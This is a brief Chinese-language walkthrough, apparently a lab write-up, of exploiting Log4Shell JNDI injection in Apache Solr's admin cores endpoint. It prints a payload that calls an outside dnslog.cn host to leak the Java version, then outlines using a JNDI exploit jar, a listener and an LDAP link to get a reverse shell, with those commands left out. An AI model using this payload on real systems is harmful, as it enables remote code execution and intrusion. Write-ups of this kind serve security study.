访问网址
发现/solr/admin/cores?action=,可以上传参数,使用dnslog,让其返回Java版本号
solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn
查看回显
开始准备反弹shell
下载JDNI,放到攻击机,输入如下命令
执行结果如下:
以上可以看到有三个服务,看到熟悉的rmi和ldap ,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听..
在攻击机开启监听端口
拿取JDK1.8的ldap直接访问
获取到shell